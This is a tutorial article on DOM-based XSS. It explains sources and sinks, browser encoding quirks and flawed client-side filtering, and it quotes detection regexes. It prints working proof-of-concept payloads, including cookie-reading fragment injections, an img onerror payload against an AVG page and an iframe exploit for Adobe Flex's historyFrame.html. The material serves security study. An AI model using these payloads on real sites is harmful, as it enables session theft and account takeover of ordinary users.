Looking for loopholes: DOM Based XSS Guide

XSS sits near the top of the OWASP Top 10 for good reason. Any competent programmer knows about it, yet the statistics do not budge: eight out of ten web applications have XSS vulnerabilities. And judging by my own experience of pentesting banks, “ten out of ten” seems closer to the truth. It may seem that the topic has been covered from A to Z, but there is one subspecies of XSS that, for various reasons, has been overlooked: DOM Based XSS. That is what I am writing about today.

A shift in focus

Attacks on clients are one of the main problems in web security. XSS, clickjacking, CSRF: all of them target ordinary users rather than the server components of a system. And while it used to be possible to profit handsomely by exploiting vulnerabilities on the server side (and penetrating the corporate network), hackers' attention is now shifting to the client side. For this reason XSS, which many regard with skepticism, can serve an attacker well.

What you can skip

First, two remarks about this article. The first: the main goal is to introduce DOM Based XSS to those who have so far passed this type of vulnerability by, to describe the subtleties of exploitation, and to share thoughts on how to organize the search for such vulnerabilities properly. It is a primer of sorts, so depending on what you already know, you can skip this or that part. The second: about half a year ago Vladimir Kochetkov wrote an excellent article on Habr, “The whole truth about XSS, or why cross-site scripting is not a vulnerability?”. It argued that XSS is an attack, not a type of vulnerability. I remember it sparked a number of fierce arguments and “crusades”, which was quite amusing... I will nevertheless call XSS both an attack and a vulnerability, even though the statement “XSS is a type of attack” is the correct one. It is simply easier that way, although understanding the distinction is, of course, important.

The ABCs of XSS

Let me remind you why we need XSS at all. No, not simply to execute our JavaScript code in a user's browser: for that we could just lure the user to a site that is completely under our control (http://evil.com).

The task is to execute OUR JavaScript code in the user's browser in the context of the attacked domain (for example, gmail.com). In other words, the goal is to bypass the Same Origin Policy, because almost all browser security rests on the SOP.
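To make the notion of “context of the attacked domain” a bit more tangible, here is a minimal sketch of the comparison that the SOP boils down to: two URLs belong to the same origin only when scheme, host, and port all match. The helper name sameOrigin is mine and purely illustrative; it relies on the standard URL class and is not how any browser actually implements the policy.

```javascript
// Hypothetical helper (not a browser API): compares the origins of two URLs.
// An origin is the scheme + host + port triple.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// Two pages on the attacked site share an origin.
console.log(sameOrigin("http://victim.com/test.html", "http://victim.com/other.html")); // true
// Our own site does not, which is exactly why we need XSS.
console.log(sameOrigin("http://evil.com/", "http://victim.com/test.html")); // false
// Even a different scheme is enough to make the origins differ.
console.log(sameOrigin("http://victim.com/", "https://victim.com/")); // false
```

Script injected through XSS runs inside the victim page itself, so from the browser's point of view it already has the victim's origin and this check never stands in its way.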

Next, what does XSS give us? In the simplest case we just get the user's session cookies. But in fact we can do everything JavaScript can: control what is displayed on the page and what is sent to the server, emulate user actions, steal data from forms... It is important to understand that XSS, depending on the situation and the attacker's skill, can become a powerful weapon. Now about classification. The usual distinction is between “stored” (“stored XSS” or “Type 2”) and “reflected” (“reflected XSS” or “Type 1”). In the stored case we submit the payload, it is saved on the server, and we then send users to the affected page. In the reflected case our payload comes back in the body of the server's response to the very request that carried it. But something is missing here. As you have probably guessed, it is the topic of today's article: DOM Based XSS (or “Type 0”). For various reasons (some described below) this type of XSS is little known, even in our circles... Perhaps this is because scanners rarely detect it. But let's move on to the theory.

What is DOM Based XSS?

To answer that question, we first need to understand what the DOM is. I'll start from afar, with my favorite topic: XML. There are two main types of XML parsers. The first, SAX (Simple API for XML), processes a document sequentially: it reads an element and generates events. It needs few resources but is very basic. The second, DOM (Document Object Model), loads the entire document into memory and represents it as a tree. More importantly, it allows full manipulation of that tree: you can add, delete, and change the structure, the elements (nodes) themselves, and their attributes. And what does XML have to do with it? HTML is a close relative of XML (XHTML is an XML dialect), and browsers use the same concept. Every HTML document received from the server is represented in the browser as a DOM tree, which can be changed through a standard API from a scripting language, in our case mostly JavaScript. The DOM consists of hierarchically nested objects called nodes. Each node in the structure represents an HTML element on the page. The root is document. The value stored in a node is text. Nodes also have attributes, which can be accessed as well. Fig. 1 shows a very simple HTML file and the hierarchy the browser builds from it. You can read more about the DOM and try JavaScript examples here: goo.gl/suiZE.

Fig. 1. The simplest DOM tree

As already mentioned, we can manipulate the DOM from JavaScript. What does this give us? In certain cases (when data is filtered incorrectly) we can use these methods to modify the DOM of the attacked site and get our JavaScript code executed in its context. In essence it is the same XSS. The simplest example:

<body> <script>document.write(location.href);</script> </body>

Having received this HTML, the browser executes the JavaScript code and writes a string into the body of the page (document.write), taking its value from location.href. The problem is that an attacker can control the value of location.href and insert JavaScript of their own, which will also be executed. So if this page is test.html, all we need in order to add our code is for the victim to follow this URL (see Fig. 2):

 http://victim.com/test.html#<script>alert(document.cookie);</script>

Fig. 2. DOM Based XSS

Fig. 2.1. Classic DOM Based XSS

It is important to note that this example does not work in Firefox. In IE and Chrome the victim has to follow a link rather than type the script into the address bar, because in the latter case the payload is URL-encoded before the code runs (it will look like “%3Cscript%3Ealert(1);%3C/script%3E”). The second example, however, works everywhere:

 <body> <script> var l = location.hash.slice(1); eval(l); </script> </body>

Exploitation:

 http://victim.com/test_eval.html#alert(document.cookie)

A slightly less standard variant of XSS:

 <body> <p>Hello my window name is: <script>document.write(window.name);</script> </p> </body>

Exploitation (we open the victim's page from our own page so that we control window.name), see Fig. 3:

 <script>window.open("http://victim.com/test_window.html", "<script>alert('XSS')</scr" + "ipt>", "", false);</script>

I hope it is now clear where DOM XSS comes from.

Fig. 3. DOM Based XSS from window.name
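For contrast with the eval example above, here is a rough sketch of how the same “do something depending on the fragment” idea could look without handing the fragment to a sink. Everything in it is hypothetical: the action names, the actions table, and the runAction helper are invented for illustration, and the hash argument merely stands in for location.hash so that the snippet runs outside a browser.

```javascript
// Hypothetical allowlist of actions the page is willing to perform.
const actions = {
  showInbox: () => "inbox shown",
  showSettings: () => "settings shown",
};

// `hash` stands in for location.hash, e.g. "#showInbox".
function runAction(hash) {
  const name = hash.slice(1); // drop the leading "#"
  // Only own keys of the allowlist are accepted; the value is never evaluated as code.
  if (!Object.prototype.hasOwnProperty.call(actions, name)) return null;
  return actions[name]();
}

console.log(runAction("#showInbox"));              // inbox shown
console.log(runAction("#alert(document.cookie)")); // null
```

The point of the sketch is only that the source (the fragment) selects among fixed behaviours instead of being executed or written into the page.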

Terminology?

The attack itself, oddly enough, is quite old. Back in 2005 Amit Klein (goo.gl/OOb3U) wrote a sensible paper on the third kind of XSS, although DOM XSS itself had been found in the wild before that. His work listed where user-controlled data can come from (Fig. 4) and which dangerous functions can lead to XSS (Fig. 5). Still, the topic has been developed and rethought mostly in recent years, thanks in large part to people like Stefano Di Paola and Mario Heiderich.

Fig. 4. From where ...

Fig. 5. Where ...

Most importantly, a terminology has been worked out. What we control and can pass to the page is called a “source”, and the place where the data ends up, the dangerous functions through which we can attack and exploit our XSS, is called a “sink”. I will not even try to find Russian equivalents for these terms. While the set of sinks has not changed much (it has only been extended), the understanding of sources has grown considerably, which somewhat changes the understanding of the attack and its classification, but more on that later. What matters here is to understand what is what in principle; there are too many details to cover. One of the most valuable resources when digging into DOM XSS is the domxsswiki project (goo.gl/yycvJ), which lists the main sources and sinks along with their subtleties in different browsers. Now, about the new classification that Aspect Security recently introduced (probably as trolling), see Fig. 6. This classification is precise and underlines the essence of DOM XSS. It does not matter where the attacker's input comes from (a specific server response, the client, the static part of the page); what matters is that the client side uses it in critical functions. For example, imagine that we can send our nickname to the server and it is stored somewhere there: the potential for stored XSS exists. But if filtering gets in our way, it would seem there is nothing more we can do. What if our nickname is also used elsewhere, this time on the client side, to modify the DOM? Then we get a second shot at XSS (now DOM XSS), because we may not need the characters that stored XSS required and that the server filtered out.

Fig. 6. New classification?

Fig. 7. New version of source types changes classification

Fig. 8. From (new version) ...

What is the point of this section? To make clear that the general concepts matter, but DOM XSS is very specific and in many ways non-trivial.

DOM XSS Specificity

So, after some general reflection and a few examples, what is specific to DOM XSS? First, DOM XSS is above all a problem of the client side of a web application. To clarify: it is not a problem of the client itself but of the client part of the application. It is incorrect filtering or use of data from untrusted sources in the client part of the web application, that is, mainly in JavaScript. This has several consequences. DOM XSS can be on “any” page, even plain HTML, as long as JavaScript is used there. Previously the search for vulnerabilities focused on server-side scripts, on pages where we could enter data and pages where we saw the result, while static pages were of no interest. Now even “static” pages can carry a vulnerability. Quite often DOM XSS does not require sending the payload to the server at all. The three examples above prove it. For the first two it is important that browsers (per the standards) do not send the server anything after the “#” character. This fragment identifier is a special part of the URI, originally used to link to parts of a document. The wiki example: “http://www.example.org/foo.html#bar” refers to the element with id=bar on the page foo.html. The trick is that the fragment is not sent to the server but is available from JavaScript. Such identifiers are used all the time on web 2.0 sites (Gmail is one example). So the URL from the first example, “http://victim.com/test.html#” followed by the payload, makes the browser request test.html without the XSS, while JavaScript sees the full string. No server-side protection (filtering of user data, any WAF or IPS) will help. The problem lies mainly on the client side of the web application. That is the first point.

Second, as a rule we cannot use the standard techniques and tools we rely on to find classic XSS and SQL injection, since they are designed specifically to find server-side problems. Third, although we do have access to the source code (JavaScript is delivered to the client), searching for such vulnerabilities properly and in depth is far from a trivial task. There are subtleties and tricks by the shovelful :).
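The point about the “#” can be shown with plain string handling. The sketch below is only an illustration: splitFragment is a made-up helper, and the split it performs mimics what the text above describes (the part before “#” is what the browser requests, the part after it stays on the client).

```javascript
// Hypothetical helper: separates what goes into the HTTP request
// from what only client-side JavaScript gets to see.
function splitFragment(url) {
  const i = url.indexOf("#");
  if (i === -1) return { requested: url, fragment: "" };
  return { requested: url.slice(0, i), fragment: url.slice(i + 1) };
}

const parts = splitFragment(
  "http://victim.com/test.html#<script>alert(document.cookie);</script>"
);
console.log(parts.requested); // http://victim.com/test.html
console.log(parts.fragment);  // <script>alert(document.cookie);</script>
```

Whatever a WAF or server-side filter inspects, it only ever sees the first of the two strings.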

Difficulties and tricks

Following up on that last point, here is an illustrative picture from a presentation by Stefano Di Paola (Fig. 9). Analyzing JavaScript is a dreadful job, especially with standard tools. Yes, Mario Heiderich wrote two regexps to find the main sinks and sources:

 /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/
 /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/
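As a rough idea of how these two expressions might be put to work, the sketch below runs them line by line over a piece of JavaScript and reports which lines touch a source or a sink. I am assuming that the first expression is the one for sinks and the second the one for sources, following the order in which they are mentioned; the scan function and the sample input are my own and not part of Mario's work.

```javascript
// The two expressions quoted above, copied verbatim.
// Assumption: the first targets sinks, the second targets sources.
const SINKS = /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/;
const SOURCES = /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/;

// Hypothetical helper: flags every line that matches either expression.
function scan(code) {
  return code
    .split("\n")
    .map((text, i) => ({
      line: i + 1,
      text: text.trim(),
      source: SOURCES.test(text),
      sink: SINKS.test(text),
    }))
    .filter((r) => r.source || r.sink);
}

// The body of the eval example from earlier, plus one harmless line.
const sample = [
  "var l = location.hash.slice(1);",
  "eval(l);",
  "var x = 1 + 2;",
].join("\n");

for (const r of scan(sample)) {
  console.log(r.line, r.source ? "source" : "-", r.sink ? "sink" : "-", r.text);
}
```

A scan like this only marks candidate lines. It says nothing about whether data actually travels from the flagged source to the flagged sink.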

But you still have to trace the entire data flow to understand where data comes from, where it goes, and in what form it arrives... Moreover, besides finding a potential DOM XSS vulnerability, you also need to write an exploit for it. Browsers differ and, worse, behave differently. Not to mention that browsers have protections against reflected XSS, which also have to be bypassed. Take the first example and the value of location.href, which contains the URL (general form):

 scheme://user:pass@host/path/to/page.ext/Pathinfo;semicolon?search.location=value#hash=value&hash2=value2

Browsers also URL-encode differently. Firefox, for example, encodes the < and > characters after #, while IE does not. IE:

 http://host/path/to/page.ext/test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?test<a"'%0A`=%20+%20>;#test<a"'%0A`=%20+%20>;

FF:

 http://host/path/to/page.ext/test%3Ca%22%27%0A%60=%20+%20%3E;test%3Ca%22%27%0A%60=%20+%20%3E?test%3Ca%22%27%0A%60=%20+%20%3E;#test%3Ca%22%27%0A%60=%20+%20%3E;

That is why the first attack works only in IE and Chrome. However, if the vulnerable page contained the code

 <body> <script>document.write(location.hash);</script> </body> <!-- location.hash instead of location.href -->

then the exploit would work in all browsers, since Firefox stores the value of this property in decoded form. Next, another example of browser quirks. Suppose a vulnerable page inserts only the host name from the referrer into a script tag:

 document.write('<script src="http://Host/image.gif?t=' + (document.referrer.split("/")[2]) + '"></script>');

It would seem there is nothing to be done here. Yet we can influence the referrer! All we need is to lure the user to our site and redirect them from a page of ours to the vulnerable one; that way we control the Referer header. Here, it seems, we hit a wall, since only the host name is used... But no. Stefano found that IE supports special characters in the host name. So we can create a subdomain of “.evil.com” with such characters or, as in Stefano's example, “" onreadystatechange=eval(name) .attacker.com”. Besides browser quirks and differences in native JavaScript, there are also the various JS frameworks, which are used almost everywhere. jQuery, for instance, has plenty of wrappers around standard sinks (see Fig. 10).

Fig. 9. JavaScript analysis is a thankless task

Fig. 10. jQuery and other frameworks make analysis more difficult.
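Returning to the referrer example above: the sketch below shows what split("/")[2] yields for an ordinary referrer and for a host name along the lines of Stefano's, and adds a strict check that a defensive version of the page might apply before using the value. The helper names refererHost and isPlainHost and the exact allowed character set are my assumptions, not something taken from the vulnerable page.

```javascript
// Same extraction the vulnerable page performs on document.referrer.
function refererHost(referrer) {
  return referrer.split("/")[2];
}

// Hypothetical check: accept only letters, digits, dots and hyphens.
function isPlainHost(host) {
  return typeof host === "string" && /^[a-z0-9.-]+$/i.test(host);
}

const normal = refererHost("http://evil.com/page.html");
console.log(normal, isPlainHost(normal)); // evil.com true

// A host name containing a quote and spaces, in the spirit of Stefano's example.
const tricky = refererHost('http://" onreadystatechange=eval(name) .attacker.com/x');
console.log(isPlainHost(tricky)); // false
```

With a check like this the quote never reaches the markup; without it, the host name closes the src attribute and adds an event handler of the attacker's choosing.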

Bypassing filters

Hopefully DOM XSS is starting to make sense. Now let's touch briefly on protection. The simplest option, of course, is to give up JS on the client side :). Clearly that is unrealistic. The next option is to avoid unsafe DOM-modifying functions and to filter user data... But, as you have probably noticed, DOM XSS is a tricky topic. It is a kind of colorful, bubbling entity with no clear boundaries. So there is no sound understanding of it among the masses, and as a result plenty of mistakes are made in protection. Not long ago I read an excellent article, which we will now go through. It describes two examples of “safe” DOM changes that rely on filtering user data. Example 1: element.textContent, which sets or reads the text value of a node and is also used to filter out HTML. For example:

 var div = document.createElement('div'); div.innerHTML = 'Hello <a href="http://bob.com">Bob</a>!'; console.log(div.textContent); // Hello Bob!;

Here div.textContent stripped the <a> markup around “Bob” when the element was read back. It looks safe, as if no XSS could get through? Not so. This approach has a quirk: it converts HTML entities back into HTML:

 var div = document.createElement('div'); div.innerHTML = 'Hello <a>&lt;script&gt;alert(&quot;!&quot;)&lt;/script&gt;</a>!'; console.log(div.textContent); // Hello <script>alert("!")</script>!

That is, with a little trickery we can simply inject our XSS. If we use this method in a slightly different order,

 var div = document.createElement('div'); div.textContent = '<span>Foo & bar</span>'; console.log(div.innerHTML) // &lt;span&gt;Foo &amp; bar&lt;/span&gt;

then the result again appears completely safe: the characters <, >, and & have been replaced with the corresponding entities. The author notes that document.createTextNode behaves similarly, and this method is also used for “filtering”. But you have probably noticed that one rather important character is missing from the filter: the quotation mark. Classic XSS theory reminds us that this opens the way to event-based XSS, which the author demonstrates with an example:

 function escapeHtml(str) {
   var div = document.createElement('div');
   div.appendChild(document.createTextNode(str));
   return div.innerHTML;
 };
 var userWebsite = '" onmouseover="alert(\'derp\')" "';
 var profileLink = '<a href="' + escapeHtml(userWebsite) + '">Bob</a>';
 var div = document.getElementById('target');
 div.innerHTML = profileLink; // <a href="" onmouseover="alert('derp')" "">Bob</a>

Oddly enough, the problem spreads and “leaks” into other solutions. jQuery, for example, has the same quirks in .text(). Some further information on filtering can be found in the same domxsswiki.
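For comparison with the escapeHtml function above, here is a sketch of an escaping routine that also covers both kinds of quotes, which is what an attribute context needs. It is written with plain string replacement so that it runs without a DOM; the name escapeHtmlAttr is mine, and the routine is an illustration rather than a complete defence (it does nothing, for instance, about javascript: URLs placed in href).

```javascript
// Hypothetical replacement for escapeHtml: encodes quotes as well as <, > and &.
function escapeHtmlAttr(str) {
  return String(str)
    .replace(/&/g, "&amp;") // must come first, or the entities below get double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The same payload as in the example above.
const userWebsite = '" onmouseover="alert(\'derp\')" "';
const profileLink = '<a href="' + escapeHtmlAttr(userWebsite) + '">Bob</a>';
console.log(profileLink);
// <a href="&quot; onmouseover=&quot;alert(&#39;derp&#39;)&quot; &quot;">Bob</a>
```

With the quotes encoded, the payload stays inside the href value instead of closing it and starting a new attribute.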

Reality

A couple of examples. First, the classic case found on Twitter. The XSS, oddly enough, was trivial:

 http://twitter.com/#!javascript:alert(document.domain);

Here the javascript: pseudo-protocol is substituted into location, and as a result our code is executed. A more recent example from the AVG site:

 //display the correct tab based on the url (#name)
 var pathname = $(location).attr('href');
 var urlparts = pathname.split("#");

Exploitation is again trivial:

 http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>
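The excerpt from the AVG page does not show what happens to urlparts[1] afterwards, so the following is only a guess at the general pattern: if the part after “#” is meant to be a tab name, it can be checked against a strict pattern before it goes anywhere near markup or a selector. The function tabFromUrl and the allowed character set are hypothetical.

```javascript
// Hypothetical, stricter version of the "tab from URL" logic.
// Returns the tab name, or null when the fragment is missing or suspicious.
function tabFromUrl(href) {
  const urlparts = href.split("#");
  if (urlparts.length < 2) return null;
  const name = urlparts[1];
  // Assumption: tab names consist only of letters, digits, "_" and "-".
  return /^[A-Za-z0-9_-]+$/.test(name) ? name : null;
}

console.log(tabFromUrl("http://www.avg.com/eu-en/download#tab2")); // tab2
console.log(tabFromUrl('http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>')); // null
```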

Next, a somewhat stranger example, where the vulnerability seems close at hand but is not easy to exploit. It was found in Adobe Flex 3. The vulnerable page, /history/historyFrame.html, is still widespread on the web (including on “big” portals).

 function processUrl() {
   var pos = url.indexOf("?");
   url = pos != -1 ? url.substr(pos + 1) : "";
   if (!parent._ie_firstload) {
     parent.BrowserHistory.setBrowserURL(url);
     try {
       parent.BrowserHistory.browserURLChange(url);
     } catch(e) { }
   } else {
     parent._ie_firstload = false;
   }
 }
 var url = document.location.href;
 processUrl();
 document.write(url);

Looking at the last lines, the XSS seems to be served on a silver platter. But there is a problem: the parent._ie_firstload check in the processUrl function. The vulnerability cannot be exploited directly, because JavaScript simply never reaches the right place. When the page is opened on its own, parent._ie_firstload does not exist, so the script crashes at “parent.BrowserHistory.setBrowserURL(url);”. But we can cheat and create a page on our own site that contains two frames:

 <html> <body> <iframe name="_ie_firstload"></iframe> <iframe src="http://www.vuln.site/app/history/historyFrame.html?#<script>alert('xss')</script>"></iframe> </body> </html>

This gives us a frame that the vulnerable page's code finds when it evaluates “if (!parent._ie_firstload)”. Since the object now exists, the check takes the else branch and the function completes successfully, letting the DOM XSS fire. But this method has its subtleties too. For example, Firefox forbids access to a parent from another domain, so, in the author's experience, it could only be used against IE. If you are interested in DOM XSS, it is worth looking at other examples to gain experience: goo.gl/ZWei3, goo.gl/gZawa, goo.gl/XRwBT, goo.gl/plqs9.
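The control flow of the historyFrame.html example can be replayed outside a browser. In the sketch below the page's parent is replaced by a plain object passed in as an argument, and document.write(url) is replaced by returning the value that would have been written; both substitutions, as well as the name simulateHistoryFrame, are my own simplifications. I also use slice where the original uses substr, which gives the same result here.

```javascript
// Simplified model of processUrl() plus the final document.write(url).
function simulateHistoryFrame(parent, href) {
  let url = href;
  const pos = url.indexOf("?");
  url = pos !== -1 ? url.slice(pos + 1) : "";
  if (!parent._ie_firstload) {
    // Not wrapped in try/catch in the original either:
    // throws when parent.BrowserHistory is undefined.
    parent.BrowserHistory.setBrowserURL(url);
    try {
      parent.BrowserHistory.browserURLChange(url);
    } catch (e) {}
  } else {
    parent._ie_firstload = false;
  }
  return url; // stands in for document.write(url)
}

const href =
  "http://www.vuln.site/app/history/historyFrame.html?#<script>alert('xss')</script>";

// Opened directly: no _ie_firstload and no BrowserHistory, so the script dies early.
try {
  simulateHistoryFrame({}, href);
} catch (e) {
  console.log("direct visit:", e.name); // direct visit: TypeError
}

// Opened from our page: a frame named _ie_firstload makes the check truthy.
console.log("framed:", simulateHistoryFrame({ _ie_firstload: {} }, href));
// framed: #<script>alert('xss')</script>
```

The sketch also shows why the exploit URL contains “?#”: the code keeps only what follows the question mark, so the payload has to sit after it.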

Afterword

I may be repeating myself, but to sum up: DOM Based XSS is still a poorly understood beast. And the more obscurity and subtlety, the more bugs, especially since JavaScript keeps “pulling the blanket over itself” and the web is becoming ever more dynamic. In short, learning is light, and creating is wonderful :). Happy researching!